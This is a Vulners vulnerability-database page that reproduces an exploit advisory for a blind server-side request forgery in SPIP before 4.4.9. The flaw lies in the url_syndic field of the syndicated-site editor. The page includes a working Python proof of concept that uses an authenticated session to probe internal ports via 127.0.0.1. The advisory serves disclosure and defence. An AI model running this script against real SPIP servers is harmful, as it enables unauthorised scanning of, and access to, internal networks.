Vulners
Lucene search
📄 SPIP Blind Server-Side Request Forgery
=============================================================================================================================================
| # Title : SPIP < 4.4.9 Blind SSRF via Syndicated Sites in Private Area |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : SPIP versions prior to 4.4.9 are vulnerable to a Blind Server-Side Request Forgery (SSRF) issue within the private administration interface.
When an authenticated user edits a syndicated site, the application fails to properly validate the url_syndic parameter. Specifically:
The syndication URL is not strictly validated as a legitimate external remote URL.
The application allows arbitrary URLs, including:
http://127.0.0.1
Internal IP ranges (e.g., 10.x.x.x, 192.168.x.x)
Potentially external attacker-controlled endpoints
The server initiates backend HTTP requests to the supplied destination.
Because the response is not directly returned to the attacker, the issue is classified as Blind SSRF. However, it can still enable:
Internal port scanning
Access to internal services (e.g., databases, cache servers)
Interaction with cloud metadata services (if applicable)
Network enumeration through timing or behavioral analysis
Importantly, this vulnerability is not mitigated by the SPIP security screen, meaning standard protection mechanisms do not prevent exploitation.
[+] POC :
import requests
target_url = "http://target-spip.com/ecrire/?exec=site_edit"
session_cookie = {"spip_session": "your_session_id_here"}
ports_to_scan = [21, 22, 80, 443, 3306, 6379]
for port in ports_to_scan:
payload = {
"url_syndic": f"http://127.0.0.1:{port}",
"syndication": "oui",
"modifier": "Enregistrer"
}
response = requests.post(target_url, data=payload, cookies=session_cookie)
print(f"Checking internal port {port}... Status: {response.status_code}")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7